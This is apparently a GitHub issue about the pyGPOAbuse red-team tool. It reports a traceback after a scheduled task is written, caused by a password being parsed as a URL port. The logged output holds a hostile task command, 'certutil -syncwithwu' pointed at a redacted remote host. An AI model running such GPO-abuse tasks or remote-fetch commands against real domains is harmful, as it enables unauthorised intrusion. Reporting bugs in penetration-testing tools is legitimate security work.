pyGPOAbuse
pyGPOAbuse copied to clipboard
Hackndo
GPO modification succeeds but barfs error
I ran this on an engagement where my low-priv account has a really long password that follows format of: A long password with a number like 1 and then a period. AND THEN ALL CAPS FOR REST OF PASSWORD. When I run pygpoabuse to modify the task, it looks like it succeeds (the task XML file gets created but doesn't ever fire, which I'll troubleshoot separately). But the script gives a huge dump of errors right after the Scheduledtasks.xml gets saved:
<snip>
[*] c:\windows\system32\cmd.exe /c "certutil -syncwithwu \\x.x.x.x"
DEBUG:root:ScheduledTasks.xml has been saved
[*] ScheduledTasks.xml has been saved
DEBUG:asyncio:Using selector: EpollSelector
[*] Using selector: EpollSelector
ERROR:root:An error occurred. Use -vv for more details
Traceback (most recent call last):
File "/opt/tools/pyGPOAbuse/pygpoabuse.py", line 148, in <module>
if gpo.update_versions(url, domain, options.gpo_id, gpo_type="user" if options.user else "computer",):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/pygpoabuse/gpo.py", line 112, in update_versions
updated_version = asyncio.run(self.update_ldap(url, domain, gpo_id, gpo_type))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/asyncio/base_events.py", line 654, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/pygpoabuse/gpo.py", line 81, in update_ldap
ldap = Ldap(url, gpo_id, domain)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/pygpoabuse/ldap.py", line 12, in __init__
conn_url = LDAPConnectionFactory.from_url(url)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/venv/lib/python3.11/site-packages/msldap/commons/factory.py", line 79, in from_url
target = MSLDAPTarget.from_url(connection_url)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/tools/pyGPOAbuse/venv/lib/python3.11/site-packages/msldap/commons/target.py", line 93, in from_url
if url_e.port:
^^^^^^^^^^
File "/root/.pyenv/versions/3.11.13/lib/python3.11/urllib/parse.py", line 182, in port
raise ValueError(f"Port could not be cast to integer value as {port!r}")
ValueError: Port could not be cast to integer value as 'A long password with a number like 1 and then a period. AND THEN ALL CAPS FOR REST OF PASSWORD.'
[x] An error occurred. Use -vv for more details
(I was already running -vv)
